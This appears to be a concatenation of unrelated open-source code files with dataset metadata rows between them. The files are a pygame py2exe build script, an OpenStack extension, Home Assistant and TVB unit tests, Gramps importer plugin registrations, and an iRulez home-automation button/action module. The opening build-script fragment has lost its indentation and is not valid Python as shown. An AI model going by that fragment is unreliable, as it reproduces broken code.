if fnmatch.fnmatch(filename, wc_name) and not os.path.isdir(filename):
names.append(filename)
if names:
lst.append((dirname, names))
file_list = []
recursive = kw.get('recursive', True)
if recursive:
os.path.walk(srcdir, walk_helper, (file_list, wildcards))
else:
walk_helper((file_list, wildcards),
srcdir,
[os.path.basename(f) for f in glob.glob(self.opj(srcdir, '*'))])
return file_list
def run(self):
if os.path.isdir(self.dist_dir): # Erase previous destination dir
shutil.rmtree(self.dist_dir)
# Use the default pygame icon, if none given
if self.icon_file is None:
path = os.path.split(pygame.__file__)[0]
self.icon_file = os.path.join(path, 'pygame.ico')
# List all data files to add
extra_datas = ["__init__.py", "CHANGES.txt", "CREDITS.txt", "eduactiv8.py", "LICENSE", "README.txt"]
for data in self.extra_datas:
if os.path.isdir(data):
extra_datas.extend(self.find_data_files(data, '*'))
else:
extra_datas.append(('.', [data]))
setup(
cmdclass={'py2exe': pygame2exe},
version=self.project_version,
description=self.project_description,
name=self.project_name,
url=self.project_url,
author=self.author_name,
author_email=self.author_email,
license=self.license,
# targets to build
# console = [{
windows=[{
'script': self.script,
'icon_resources': [(0, self.icon_file)],
'copyright': self.copyright
}],
options={'py2exe': {'optimize': 2, 'bundle_files': 1, 'compressed': True,
'excludes': self.exclude_modules, 'packages': self.extra_modules,
'dll_excludes': self.exclude_dll,
'includes': self.extra_scripts}},
zipfile=self.zipfile_name,
data_files=extra_datas,
dist_dir=self.dist_dir
)
if os.path.isdir('build'): # Clean up build dir
shutil.rmtree('build')
if __name__ == '__main__':
if operator.lt(len(sys.argv), 2):
sys.argv.append('py2exe')
BuildExe().run() # Run generation
| gpl-3.0 | 4,976,437,304,179,288,000 | 34.619048 | 139 | 0.596257 | false |
ChinaMassClouds/copenstack-server | openstack/src/nova-2014.2/nova/api/openstack/compute/contrib/createserverext.py | 100 | 1156 | # Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.api.openstack import extensions
class Createserverext(extensions.ExtensionDescriptor):
"""Extended support to the Create Server v1.1 API."""
name = "Createserverext"
alias = "os-create-server-ext"
namespace = ("http://docs.openstack.org/compute/ext/"
"createserverext/api/v1.1")
updated = "2011-07-19T00:00:00Z"
def get_resources(self):
res = extensions.ResourceExtension('os-create-server-ext',
inherits='servers')
return [res]
| gpl-2.0 | -591,397,606,980,651,900 | 37.533333 | 78 | 0.679066 | false |
srcLurker/home-assistant | tests/components/test_input_boolean.py | 15 | 3095 | """The tests for the input_boolean component."""
# pylint: disable=protected-access
import unittest
import logging
from tests.common import get_test_home_assistant
from homeassistant.bootstrap import setup_component
from homeassistant.components.input_boolean import (
DOMAIN, is_on, toggle, turn_off, turn_on)
from homeassistant.const import (
STATE_ON, STATE_OFF, ATTR_ICON, ATTR_FRIENDLY_NAME)
_LOGGER = logging.getLogger(__name__)
class TestInputBoolean(unittest.TestCase):
"""Test the input boolean module."""
# pylint: disable=invalid-name
def setUp(self):
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
# pylint: disable=invalid-name
def tearDown(self):
"""Stop everything that was started."""
self.hass.stop()
def test_config(self):
"""Test config."""
invalid_configs = [
None,
1,
{},
{'name with space': None},
]
for cfg in invalid_configs:
self.assertFalse(
setup_component(self.hass, DOMAIN, {DOMAIN: cfg}))
def test_methods(self):
"""Test is_on, turn_on, turn_off methods."""
self.assertTrue(setup_component(self.hass, DOMAIN, {DOMAIN: {
'test_1': None,
}}))
entity_id = 'input_boolean.test_1'
self.assertFalse(
is_on(self.hass, entity_id))
turn_on(self.hass, entity_id)
self.hass.block_till_done()
self.assertTrue(
is_on(self.hass, entity_id))
turn_off(self.hass, entity_id)
self.hass.block_till_done()
self.assertFalse(
is_on(self.hass, entity_id))
toggle(self.hass, entity_id)
self.hass.block_till_done()
self.assertTrue(is_on(self.hass, entity_id))
def test_config_options(self):
"""Test configuration options."""
count_start = len(self.hass.states.entity_ids())
_LOGGER.debug('ENTITIES @ start: %s', self.hass.states.entity_ids())
self.assertTrue(setup_component(self.hass, DOMAIN, {DOMAIN: {
'test_1': None,
'test_2': {
'name': 'Hello World',
'icon': 'mdi:work',
'initial': True,
},
}}))
_LOGGER.debug('ENTITIES: %s', self.hass.states.entity_ids())
self.assertEqual(count_start + 2, len(self.hass.states.entity_ids()))
state_1 = self.hass.states.get('input_boolean.test_1')
state_2 = self.hass.states.get('input_boolean.test_2')
self.assertIsNotNone(state_1)
self.assertIsNotNone(state_2)
self.assertEqual(STATE_OFF, state_1.state)
self.assertNotIn(ATTR_ICON, state_1.attributes)
self.assertNotIn(ATTR_FRIENDLY_NAME, state_1.attributes)
self.assertEqual(STATE_ON, state_2.state)
self.assertEqual('Hello World',
state_2.attributes.get(ATTR_FRIENDLY_NAME))
self.assertEqual('mdi:work', state_2.attributes.get(ATTR_ICON))
| mit | -5,577,756,883,282,271,000 | 28.47619 | 77 | 0.593215 | false |
echohenry2006/tvb-library | tvb/tests/library/simulator/noise_test.py | 3 | 2676 | # -*- coding: utf-8 -*-
#
#
# TheVirtualBrain-Scientific Package. This package holds all simulators, and
# analysers necessary to run brain-simulations. You can use it stand alone or
# in conjunction with TheVirtualBrain-Framework Package. See content of the
# documentation-folder for more details. See also http://www.thevirtualbrain.org
#
# (c) 2012-2013, Baycrest Centre for Geriatric Care ("Baycrest")
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License version 2 as published by the Free
# Software Foundation. This program is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
# License for more details. You should have received a copy of the GNU General
# Public License along with this program; if not, you can download it here
# http://www.gnu.org/licenses/old-licenses/gpl-2.0
#
#
# CITATION:
# When using The Virtual Brain for scientific publications, please cite it as follows:
#
# Paula Sanz Leon, Stuart A. Knock, M. Marmaduke Woodman, Lia Domide,
# Jochen Mersmann, Anthony R. McIntosh, Viktor Jirsa (2013)
# The Virtual Brain: a simulator of primate brain network dynamics.
# Frontiers in Neuroinformatics (7:10. doi: 10.3389/fninf.2013.00010)
#
#
"""
Test for tvb.simulator.noise module
.. moduleauthor:: Paula Sanz Leon <[email protected]>
"""
if __name__ == "__main__":
from tvb.tests.library import setup_test_console_env
setup_test_console_env()
import unittest
from tvb.tests.library.base_testcase import BaseTestCase
from tvb.simulator import noise
from tvb.datatypes import equations
class NoiseTest(BaseTestCase):
def test_stream(self):
noise_stream = noise.RandomStream()
self.assertEqual(noise_stream.init_seed, 42)
def test_additive(self):
noise_additive = noise.Additive()
self.assertEqual(noise_additive.ntau, 0.0)
def test_multiplicative(self):
noise_multiplicative = noise.Multiplicative()
self.assertEqual(noise_multiplicative.ntau, 0.0)
self.assertTrue(isinstance(noise_multiplicative.b, equations.Linear))
def suite():
"""
Gather all the tests in a test suite.
"""
test_suite = unittest.TestSuite()
test_suite.addTest(unittest.makeSuite(NoiseTest))
return test_suite
if __name__ == "__main__":
#So you can run tests from this package individually.
TEST_RUNNER = unittest.TextTestRunner()
TEST_SUITE = suite()
TEST_RUNNER.run(TEST_SUITE) | gpl-2.0 | 6,864,413,495,467,668,000 | 33.766234 | 86 | 0.71861 | false |
Fedik/gramps | gramps/plugins/importer/import.gpr.py | 4 | 5381 | #
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2009 Benny Malengier
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
from gramps.gen.plug._pluginreg import newplugin, STABLE, IMPORT
from gramps.gen.const import GRAMPS_LOCALE as glocale
_ = glocale.translation.gettext
MODULE_VERSION="5.2"
#------------------------------------------------------------------------
#
# Comma Separated Values Spreadsheet (CSV)
#
#------------------------------------------------------------------------
_mime_type = "text/x-comma-separated-values" # CSV Document
_mime_type_rfc_4180 = "text/csv" # CSV Document See rfc4180 for mime type
plg = newplugin()
plg.id = 'im_csv'
plg.name = _("Comma Separated Values Spreadsheet (CSV)")
plg.description = _("Import data from CSV files")
plg.version = '1.0'
plg.gramps_target_version = MODULE_VERSION
plg.status = STABLE
plg.fname = 'importcsv.py'
plg.ptype = IMPORT
plg.import_function = 'importData'
plg.extension = "csv"
#------------------------------------------------------------------------
#
# GEDCOM
#
#------------------------------------------------------------------------
plg = newplugin()
plg.id = 'im_ged'
plg.name = _('GEDCOM')
plg.description = _('GEDCOM is used to transfer data between genealogy programs. '
'Most genealogy software will accept a GEDCOM file as input.')
plg.version = '1.0'
plg.gramps_target_version = MODULE_VERSION
plg.status = STABLE
plg.fname = 'importgedcom.py'
plg.ptype = IMPORT
plg.import_function = 'importData'
plg.extension = "ged"
#------------------------------------------------------------------------
#
# Geneweb
#
#------------------------------------------------------------------------
plg = newplugin()
plg.id = 'im_geneweb'
plg.name = _('GeneWeb')
plg.description = _('Import data from GeneWeb files')
plg.version = '1.0'
plg.gramps_target_version = MODULE_VERSION
plg.status = STABLE
plg.fname = 'importgeneweb.py'
plg.ptype = IMPORT
plg.import_function = 'importData'
plg.extension = "gw"
#------------------------------------------------------------------------
#
# Gramps package (portable XML)
#
#------------------------------------------------------------------------
plg = newplugin()
plg.id = 'im_gpkg'
plg.name = _('Gramps package (portable XML)')
plg.description = _('Import data from a Gramps package (an archived XML '
'Family Tree together with the media object files.)')
plg.version = '1.0'
plg.gramps_target_version = MODULE_VERSION
plg.status = STABLE
plg.fname = 'importgpkg.py'
plg.ptype = IMPORT
plg.import_function = 'impData'
plg.extension = "gpkg"
#------------------------------------------------------------------------
#
# Gramps XML database
#
#------------------------------------------------------------------------
plg = newplugin()
plg.id = 'im_gramps'
plg.name = _('Gramps XML Family Tree')
plg.description = _('The Gramps XML format is a text '
'version of a Family Tree. It is '
'read-write compatible with the '
'present Gramps database format.')
plg.version = '1.0'
plg.gramps_target_version = MODULE_VERSION
plg.status = STABLE
plg.fname = 'importxml.py'
plg.ptype = IMPORT
plg.import_function = 'importData'
plg.extension = "gramps"
#------------------------------------------------------------------------
#
# GRDB database
#
#------------------------------------------------------------------------
plg = newplugin()
plg.id = 'im_grdb'
plg.name = _('Gramps 2.x database')
plg.description = _('Import data from Gramps 2.x database files')
plg.version = '1.0'
plg.gramps_target_version = MODULE_VERSION
plg.status = STABLE
plg.fname = 'importgrdb.py'
plg.ptype = IMPORT
plg.import_function = 'importData'
plg.extension = "grdb"
#------------------------------------------------------------------------
#
# Pro-Gen Files
#
#------------------------------------------------------------------------
plg = newplugin()
plg.id = 'im_progen'
plg.name = _('Pro-Gen')
plg.description = _('Import data from Pro-Gen files')
plg.version = '1.0'
plg.gramps_target_version = MODULE_VERSION
plg.status = STABLE
plg.fname = 'importprogen.py'
plg.ptype = IMPORT
plg.import_function = '_importData'
plg.extension = "def"
#------------------------------------------------------------------------
#
# vCard
#
#------------------------------------------------------------------------
plg = newplugin()
plg.id = 'im_vcard'
plg.name = _('vCard')
plg.description = _('Import data from vCard files')
plg.version = '1.0'
plg.gramps_target_version = MODULE_VERSION
plg.status = STABLE
plg.fname = 'importvcard.py'
plg.ptype = IMPORT
plg.import_function = 'importData'
plg.extension = "vcf"
| gpl-2.0 | 6,795,835,029,941,055,000 | 29.748571 | 82 | 0.550084 | false |
deklungel/iRulez | src/button/_domain.py | 1 | 29130 | from enum import IntEnum
import src.irulez.util as util
from abc import ABC, abstractmethod
import src.irulez.log as log
from datetime import time
from typing import List, Dict, Optional
import src.irulez.constants as constants
from threading import Timer
logger = log.get_logger('button_domain')
class ArduinoPinType(IntEnum):
"""Represents the purpose of a pin on an arduino"""
BUTTON = 1
OUTPUT = 2
DIMMER = 3
class ActionType(IntEnum):
"""Represents what should happen.
Toggle --> Relay H <-> L,
On --> Relay H,
Off --> Relay L,
Follow_Button --> when button pressed -> relay H,
dimmer --> dimmer"""
TOGGLE = 1
ON = 2
OFF = 3
FOLLOW_BUTTON = 4
ON_DIMMER = 5
OFF_DIMMER = 6
TOGGLE_DIMMER = 7
class ActionTriggerType(IntEnum):
"""Represents when a action need to be executed"""
IMMEDIATELY = 1
AFTER_RELEASE = 2
LONG_DOWN = 3
class Operator(IntEnum):
AND = 1
OR = 2
class ConditionType(IntEnum):
LIST = 1
OUTPUT_PIN = 2
TIME = 3
class ActionTrigger(ABC):
def __init__(self, trigger_type: ActionTriggerType):
self.trigger_type = trigger_type
def get_action_trigger_type(self) -> ActionTriggerType:
return self.trigger_type
class Condition(ABC):
def __init__(self, condition_type: ConditionType):
self.condition_type = condition_type
class Notification(ABC):
    def __init__(self, message: str, enabled: bool = False):
self.message = message
self.enabled = enabled
@abstractmethod
def get_topic_name(self) -> str:
pass
@abstractmethod
def get_payload(self) -> str:
pass
class ImmediatelyActionTrigger(ActionTrigger):
def __init__(self) -> None:
super(ImmediatelyActionTrigger, self).__init__(ActionTriggerType.IMMEDIATELY)
class AfterReleaseActionTrigger(ActionTrigger):
def __init__(self) -> None:
super(AfterReleaseActionTrigger, self).__init__(ActionTriggerType.AFTER_RELEASE)
class LongDownActionTrigger(ActionTrigger):
def __init__(self, seconds_down: int):
super(LongDownActionTrigger, self).__init__(ActionTriggerType.LONG_DOWN)
self._seconds_down = seconds_down
@property
def seconds_down(self) -> int:
return self._seconds_down
class Pin(ABC):
"""Represents a pin on an arduino"""
def __init__(self, number: int, pin_type: ArduinoPinType, state=False):
self.number = number
self.pin_type = pin_type
self.state = state
class OutputPin(Pin):
"""Represents a single pin on an arduino"""
def __init__(self, number: int, parent: str, state=False):
"""
Creates a new output pin
:param number: number of this pin on the given arduino
:param parent: name of the arduino
:param state: Initial state
"""
super(OutputPin, self).__init__(number, ArduinoPinType.OUTPUT, state)
self.parent = parent
class IndividualAction:
"""Represents the actions on pins that have to happen on a single arduino"""
def __init__(self,
delay: int,
pin_numbers_on: List[int],
pin_numbers_off: List[int]):
self.delay = delay
self.pin_numbers_on = pin_numbers_on
self.pin_numbers_off = pin_numbers_off
def add_pin_on(self, pin_number: int):
self.pin_numbers_on.append(pin_number)
def add_pin_off(self, pin_number: int):
self.pin_numbers_off.append(pin_number)
def has_values_on(self) -> bool:
if len(self.pin_numbers_on) > 0:
return True
return False
def has_values_off(self) -> bool:
if len(self.pin_numbers_off) > 0:
return True
return False
class IndividualDimAction:
"""Represents a dimmer action for a single arduino"""
def __init__(self,
dim_speed: int,
dim_light_value: int,
delay: int,
cancel_on_button_release: bool):
self.__speed = dim_speed
self.__dim_light_value = dim_light_value
self.__delay = delay
self.__pin_numbers = []
self.__cancel_on_button_release = cancel_on_button_release
def add_pin(self, pin_number: int):
self.__pin_numbers.append(pin_number)
def has_values(self) -> bool:
if len(self.__pin_numbers) > 0:
return True
return False
@property
def speed(self) -> int:
return self.__speed
@property
def dim_light_value(self) -> int:
"""The value the pins should go to"""
return self.__dim_light_value
@property
def delay(self) -> int:
return self.__delay
@property
def pin_numbers(self) -> List[int]:
return self.__pin_numbers
@property
def cancel_on_button_release(self) -> bool:
return self.__cancel_on_button_release
class Action(ABC):
"""Represents a single action"""
def __init__(self,
trigger: ActionTrigger,
action_type: ActionType,
delay: int,
output_pins: List[OutputPin],
notifications: List[Notification],
condition: Optional[Condition],
click_number: int):
self.trigger = trigger
self.action_type = action_type
self.delay = delay
self.output_pins = output_pins
self.notifications = notifications
self.condition = condition
self.click_number = click_number
def get_condition(self) -> Condition:
return self.condition
class DimmerAction(Action):
"""Represents a single dimmer action"""
def __init__(self,
trigger: ActionTrigger,
action_type: ActionType,
delay: int,
output_pins: List[OutputPin],
notifications: List[Notification],
condition: Optional[Condition],
click_number: int,
dimmer_speed: int,
cancel_on_button_release: bool):
super(DimmerAction, self).__init__(trigger, action_type, delay, output_pins, notifications, condition,
click_number)
self._dimmer_speed = dimmer_speed
self._cancel_on_button_release = cancel_on_button_release
@property
def cancel_on_button_release(self) -> bool:
return self._cancel_on_button_release
class ButtonPin(Pin):
"""Represents a single input pin on an arduino"""
def __init__(self, number: int, actions: List[Action], time_between_clicks, state=False):
self.__actions = actions
self.__long_down_timer = None
self.__multi_click_timer = None
self.__longdown_executed = False
self.__time_between_clicks = time_between_clicks
self.__clicks = 0
self.__dimmer_direction = True
super(ButtonPin, self).__init__(number, ArduinoPinType.BUTTON, state)
def get_button_immediate_actions(self) -> List[Action]:
results = []
for action in self.actions:
if action.trigger.trigger_type == ActionTriggerType.IMMEDIATELY and self.clicks == action.click_number:
results.append(action)
return results
def get_button_after_release_actions(self) -> List[Action]:
results = []
for action in self.actions:
if action.trigger.trigger_type == ActionTriggerType.AFTER_RELEASE and self.clicks == action.click_number:
results.append(action)
return results
def get_smallest_longdown_time(self, minimum_time: int) -> Optional[int]:
longdown_time = None
for action in self.actions:
if action.click_number == self.clicks and action.trigger.trigger_type == ActionTriggerType.LONG_DOWN and \
isinstance(action.trigger, LongDownActionTrigger):
                if action.trigger.seconds_down > minimum_time and \
                        (longdown_time is None or action.trigger.seconds_down < longdown_time):
                    longdown_time = action.trigger.seconds_down
return longdown_time
def get_button_long_down_actions(self, seconds_down: int) -> List[Action]:
results = []
for action in self.actions:
if action.trigger.trigger_type == ActionTriggerType.LONG_DOWN and \
action.trigger.seconds_down == seconds_down and isinstance(action.trigger, LongDownActionTrigger):
results.append(action)
return results
def has_cancellable_dimmer_actions(self) -> bool:
for action in self.actions:
if isinstance(action, DimmerAction) and action.cancel_on_button_release:
return True
return False
def has_multi_click_actions(self, minimum_click: int) -> bool:
for action in self.actions:
            if action.click_number >= minimum_click and action.click_number > 1:
return True
return False
def start_long_down_timer(self, interval: int, function, args: List[object]):
logger.debug(f"Start long down timer")
self.__long_down_timer = Timer(interval, function, args=(args,))
self.__long_down_timer.start()
def stop_long_down_timer(self) -> None:
logger.debug(f"Stop long down timer")
self.__long_down_timer.cancel()
self.__long_down_timer = None
def start_multi_click_timer(self, interval: int, function, args: List[object]):
logger.debug(f"Start multi click timer")
self.__multi_click_timer = Timer(interval, function, args=(args,))
self.__multi_click_timer.start()
def stop_multi_click_timer(self) -> None:
logger.debug(f"Stop multi click timer")
self.__multi_click_timer.cancel()
self.__multi_click_timer = None
def reverse_dimmer_direction(self) -> None:
self.__dimmer_direction = not self.dimmer_direction
@property
def multi_click_timer(self) -> Timer:
return self.__multi_click_timer
@property
def dimmer_direction(self) -> bool:
return self.__dimmer_direction
@dimmer_direction.setter
def dimmer_direction(self, dimmer_direction: bool):
self.__dimmer_direction = dimmer_direction
@property
def time_between_clicks(self) -> float:
return self.__time_between_clicks
@property
def long_down_timer(self) -> Timer:
return self.__long_down_timer
@long_down_timer.setter
def long_down_timer(self, long_down_timer: Timer):
self.__long_down_timer = long_down_timer
@property
def clicks(self) -> int:
return self.__clicks
@clicks.setter
def clicks(self, clicks: int):
self.__clicks = clicks
@property
def actions(self) -> List[Action]:
return self.__actions
@property
def longdown_executed(self) -> bool:
return self.__longdown_executed
@longdown_executed.setter
def longdown_executed(self, longdown_executed: bool):
self.__longdown_executed = longdown_executed
class Arduino:
"""Represents an actual arduino"""
def __init__(self, name: str, number_of_outputs_pins: int, number_of_button_pins: int):
self.name = name
self.number_of_output_pins = number_of_outputs_pins
self.number_of_button_pins = number_of_button_pins
self.__output_pins = dict()
self._button_pins = dict()
@property
def button_pins(self) -> Dict[int, ButtonPin]:
return self._button_pins
@property
def output_pins(self) -> Dict[int, OutputPin]:
return self.__output_pins
def set_output_pin(self, output_pin: OutputPin):
self.output_pins[output_pin.number] = output_pin
def set_output_pins(self, output_pins: List[OutputPin]):
for pin in output_pins:
self.output_pins[pin.number] = pin
def set_button_pin(self, button_pin: ButtonPin):
self._button_pins[button_pin.number] = button_pin
def set_button_pins(self, button_pins: List[ButtonPin]):
for pin in button_pins:
self._button_pins[pin.number] = pin
def get_output_pin(self, pin_number: int) -> OutputPin:
return self.output_pins[pin_number]
def get_changed_pins(self, payload: str) -> Dict[int, bool]:
status = util.convert_hex_to_array(payload, self.number_of_output_pins)
changed_pins = dict()
for pin in self._button_pins.values():
if bool(int(status[pin.number])) != pin.state:
changed_pins[pin.number] = bool(int(status[pin.number]))
pin.state = bool(int(status[pin.number]))
return changed_pins
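# Usage sketch (hypothetical values, not from the original code): an incoming
# status payload is the hex-encoded bitmask of the arduino's pin states.
# Assuming util.convert_hex_to_array yields one '0'/'1' entry per pin number,
# get_changed_pins diffs it against the cached button-pin states:
#   arduino = Arduino('demo', number_of_outputs_pins=16, number_of_button_pins=16)
#   arduino.set_button_pin(ButtonPin(3, [], time_between_clicks=0.5))
#   changed = arduino.get_changed_pins('0008')  # e.g. {3: True} if pin 3 went high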
class IndividualRealTimeDimAction(IndividualAction):
"""Represents a dimmer action for a single arduino"""
def __init__(self,
dim_speed: int,
dim_light_value: int,
delay: int,
pin_numbers_on: List[int],
pin_numbers_off: List[int],
arduino: Arduino,
button: ButtonPin):
        super(IndividualRealTimeDimAction, self).__init__(delay, pin_numbers_on, pin_numbers_off)
self.speed = dim_speed
self.dim_light_value = dim_light_value
self.arduino = arduino
self.button = button
class MailNotification(Notification):
def __init__(self, message: str, subject: str, mails: List[str], enabled=False):
super(MailNotification, self).__init__(message, enabled)
self.mails = mails
self.subject = subject
def get_topic_name(self) -> str:
return constants.iRulezTopic + "/" + constants.notificationTopic + "/" + constants.mailTopic
def get_payload(self) -> str:
return util.serialize_json(
{
"mails": self.mails,
"message": self.message,
"subject": self.subject
})
class TelegramNotification(Notification):
def __init__(self, message: str, tokens: List[str], enabled=False):
super(TelegramNotification, self).__init__(message, enabled)
self.tokens = tokens
def get_topic_name(self) -> str:
return constants.iRulezTopic + "/" + constants.notificationTopic + "/" + constants.telegramTopic
def get_payload(self) -> str:
return util.serialize_json(
{
"tokens": self.tokens,
"message": self.message
})
class ConditionList(Condition):
def __init__(self, operator: Operator, conditions: List[Condition]):
super(ConditionList, self).__init__(ConditionType.LIST)
self.operator = operator
self.conditions = conditions
class OutputPinCondition(Condition):
def __init__(self, output_pin: OutputPin, status: bool):
super(OutputPinCondition, self).__init__(ConditionType.OUTPUT_PIN)
self.output_pin = output_pin
self.status = status
class TimeCondition(Condition):
def __init__(self, from_time: time, to_time: time):
super(TimeCondition, self).__init__(ConditionType.TIME)
self.from_time = from_time
self.to_time = to_time
class OnAction(Action):
def __init__(self,
trigger: ActionTrigger,
delay: int,
off_timer: int,
output_pins: List[OutputPin],
notifications: List[Notification],
condition: Optional[Condition],
click_number: int):
self.off_timer = off_timer
super(OnAction, self).__init__(trigger, ActionType.ON, delay, output_pins, notifications,
condition, click_number)
def perform_action(self, pins_to_switch: Dict[str, List[IndividualAction]]):
temp_pin_actions = {}
for pin in self.output_pins:
if pin.parent not in temp_pin_actions:
pin_action = IndividualAction(self.delay, [], [])
pin_action.add_pin_on(pin.number)
temp_pin_actions[pin.parent] = pin_action
else:
temp_pin_actions[pin.parent].add_pin_on(pin.number)
for key in temp_pin_actions:
if temp_pin_actions[key].has_values_on():
pins_to_switch.setdefault(key, []).append(temp_pin_actions[key])
if self.off_timer > 0:
for pin in self.output_pins:
if pin.parent not in temp_pin_actions:
pin_action = IndividualAction(self.off_timer, [], [])
pin_action.add_pin_off(pin.number)
temp_pin_actions[pin.parent] = pin_action
else:
temp_pin_actions[pin.parent].add_pin_off(pin.number)
for key in temp_pin_actions:
if temp_pin_actions[key].has_values_off():
pins_to_switch.setdefault(key, []).append(temp_pin_actions[key])
class OffAction(Action):
def __init__(self,
trigger: ActionTrigger,
delay: int,
on_timer: int,
output_pins: List[OutputPin],
notifications: List[Notification],
condition: Optional[Condition],
click_number: int):
self.on_timer = on_timer
super(OffAction, self).__init__(trigger, ActionType.OFF, delay, output_pins, notifications,
condition, click_number)
def perform_action(self, pins_to_switch: Dict[str, List[IndividualAction]]):
temp_pin_actions = {}
for pin in self.output_pins:
if pin.parent not in temp_pin_actions:
pin_action = IndividualAction(self.delay, [], [])
pin_action.add_pin_off(pin.number)
temp_pin_actions[pin.parent] = pin_action
else:
temp_pin_actions[pin.parent].add_pin_off(pin.number)
for key in temp_pin_actions:
if temp_pin_actions[key].has_values_off():
pins_to_switch.setdefault(key, []).append(temp_pin_actions[key])
if self.on_timer > 0:
for pin in self.output_pins:
if pin.parent not in temp_pin_actions:
pin_action = IndividualAction(self.on_timer, [], [])
pin_action.add_pin_on(pin.number)
temp_pin_actions[pin.parent] = pin_action
else:
temp_pin_actions[pin.parent].add_pin_on(pin.number)
for key in temp_pin_actions:
if temp_pin_actions[key].has_values_on():
pins_to_switch.setdefault(key, []).append(temp_pin_actions[key])
class ToggleAction(Action):
def __init__(self,
trigger: ActionTrigger,
delay: int,
output_pins: List[OutputPin],
notifications: List[Notification],
master: OutputPin,
condition: Optional[Condition],
click_number: int):
super(ToggleAction, self).__init__(trigger, ActionType.TOGGLE, delay, output_pins, notifications,
condition, click_number)
self.master = master
def perform_action(self, pins_to_switch: Dict[str, List[IndividualAction]], master: bool):
        # if master is on, turn all the lights off and vice versa
temp_pin_actions = {}
if master:
for pin in self.output_pins:
if pin.parent not in temp_pin_actions:
pin_action = IndividualAction(self.delay, [], [])
pin_action.add_pin_off(pin.number)
temp_pin_actions[pin.parent] = pin_action
else:
temp_pin_actions[pin.parent].add_pin_off(pin.number)
for key in temp_pin_actions:
if temp_pin_actions[key].has_values_off():
pins_to_switch.setdefault(key, []).append(temp_pin_actions[key])
else:
for pin in self.output_pins:
if pin.parent not in temp_pin_actions:
pin_action = IndividualAction(self.delay, [], [])
pin_action.add_pin_on(pin.number)
temp_pin_actions[pin.parent] = pin_action
else:
temp_pin_actions[pin.parent].add_pin_on(pin.number)
for key in temp_pin_actions:
if temp_pin_actions[key].has_values_on():
pins_to_switch.setdefault(key, []).append(temp_pin_actions[key])
class OnDimmerAction(DimmerAction):
def __init__(self,
trigger: ActionTrigger,
delay: int,
off_timer: int,
output_pins: List[OutputPin],
notifications: List[Notification],
condition: Optional[Condition],
click_number: int,
dimmer_speed: int,
dimmer_light_value: int,
cancel_on_button_release: bool,
master_dim_id: int):
self.__off_timer = off_timer
self.__dimmer_light_value = dimmer_light_value
self.__master_dim_id = master_dim_id
super(OnDimmerAction, self).__init__(trigger, ActionType.ON_DIMMER, delay, output_pins, notifications,
condition, click_number, dimmer_speed, cancel_on_button_release)
def perform_action(self, pin_to_dim: Dict[str, List[IndividualDimAction]]):
temp_pin_actions = {}
for pin in self.output_pins:
if pin.parent not in temp_pin_actions:
if self.__dimmer_light_value is None:
self.__dimmer_light_value = 100
pin_action = IndividualDimAction(self._dimmer_speed, self.__dimmer_light_value, self.delay,
self._cancel_on_button_release)
pin_action.add_pin(pin.number)
temp_pin_actions[pin.parent] = pin_action
else:
temp_pin_actions[pin.parent].add_pin(pin.number)
for key in temp_pin_actions:
if temp_pin_actions[key].has_values():
pin_to_dim.setdefault(key, []).append(temp_pin_actions[key])
if self.__off_timer > 0:
for pin in self.output_pins:
if pin.parent not in temp_pin_actions:
pin_action = IndividualDimAction(self._dimmer_speed, 0, self.__off_timer,
self._cancel_on_button_release)
pin_action.add_pin(pin.number)
temp_pin_actions[pin.parent] = pin_action
else:
temp_pin_actions[pin.parent].add_pin(pin.number)
for key in temp_pin_actions:
if temp_pin_actions[key].has_values():
pin_to_dim.setdefault(key, []).append(temp_pin_actions[key])
class OffDimmerAction(DimmerAction):
def __init__(self,
trigger: ActionTrigger,
delay: int,
on_timer: int,
output_pins: List[OutputPin],
notifications: List[Notification],
condition: Optional[Condition],
click_number: int,
dimmer_speed: int,
cancel_on_button_release: bool):
self.__on_timer = on_timer
super(OffDimmerAction, self).__init__(trigger, ActionType.OFF_DIMMER, delay, output_pins, notifications,
condition, click_number, dimmer_speed, cancel_on_button_release)
def perform_action(self, pin_to_dim: Dict[str, List[IndividualDimAction]]):
temp_pin_actions = {}
for pin in self.output_pins:
if pin.parent not in temp_pin_actions:
pin_action = IndividualDimAction(self._dimmer_speed, 0, self.delay, self._cancel_on_button_release)
pin_action.add_pin(pin.number)
temp_pin_actions[pin.parent] = pin_action
else:
temp_pin_actions[pin.parent].add_pin(pin.number)
for key in temp_pin_actions:
if temp_pin_actions[key].has_values():
pin_to_dim.setdefault(key, []).append(temp_pin_actions[key])
if self.__on_timer > 0:
for pin in self.output_pins:
if pin.parent not in temp_pin_actions:
pin_action = IndividualDimAction(self._dimmer_speed, 0, self.__on_timer,
self._cancel_on_button_release)
pin_action.add_pin(pin.number)
temp_pin_actions[pin.parent] = pin_action
else:
temp_pin_actions[pin.parent].add_pin(pin.number)
for key in temp_pin_actions:
if temp_pin_actions[key].has_values():
pin_to_dim.setdefault(key, []).append(temp_pin_actions[key])
class ToggleDimmerAction(DimmerAction):
def __init__(self,
trigger: ActionTrigger,
delay: int,
output_pins: List[OutputPin],
notifications: List[Notification],
master: OutputPin,
condition: Optional[Condition],
click_number: int,
dimmer_speed: int,
dimmer_light_value: int,
cancel_on_button_release: bool,
master_dim_id: Optional[int]):
super(ToggleDimmerAction, self).__init__(trigger, ActionType.TOGGLE_DIMMER, delay, output_pins, notifications,
condition, click_number, dimmer_speed, cancel_on_button_release)
self.master = master
